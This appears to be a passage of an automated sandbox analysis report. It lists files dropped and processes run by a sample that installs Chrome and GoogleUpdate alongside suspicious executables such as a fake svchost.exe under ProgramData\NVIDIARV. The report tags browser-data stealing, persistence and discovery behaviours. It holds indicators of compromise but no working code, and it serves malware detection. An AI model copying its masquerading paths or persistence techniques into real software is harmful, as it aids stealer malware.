File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\sl.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\th.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\v8_context_snapshot.bin C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\chrome.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_fil.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\default_apps\external_extensions.json C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\hu.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\ru.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\sk.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\uk.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\PrivacySandboxAttestationsPreloaded\privacy-sandbox-attestations.dat C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\os_update_handler.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_gu.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_hi.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_nl.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\d3dcompiler_47.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\it.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\tr.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\chrome_wer.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\chrome.dll.sig C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_iw.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\libGLESv2.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\133.0.6943.127\Installer\setup.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_pl.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ro.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\de.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\en-US.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\eventlog_provider.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ar.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_zh-CN.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\psmachine.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\lt.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\ta.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoDev.png C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\WidevineCdm\LICENSE C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoCanary.png C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ca.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_es-419.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_id.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_pt-BR.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_te.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\psuser.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_es.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_fi.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_lt.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_lv.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\chrome_100_percent.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\da.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\es-419.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ml.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI972C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_cs.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_en.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_zh-CN.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SystemTemp\GUTCB9A.tmp C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateComRegisterShell64.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_hu.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_iw.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\chrome_installer.log C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\chrome_installer.log C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdate.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateBroker.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\psmachine_64.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_de.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_hr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_uk.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateSetup.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_it.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ja.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ko.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\psuser.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_el.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_en-GB.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_hi.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\Installer\MSI976C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_bn.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_lt.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\Installer\MSI97DA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\psmachine.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fil.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_is.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ru.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_th.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_vi.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_et.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_nl.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_no.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ar.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_sw.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_da.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_gu.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_id.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ta.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_es-419.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\psuser_64.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_am.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fi.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_sk.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_sr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_sv.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ur.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_zh-TW.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleCrashHandler.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateCore.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fa.dll C:\ProgramData\setup\setup.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\setup\aa.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\setup\setup.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Smart\setup.exe N/A
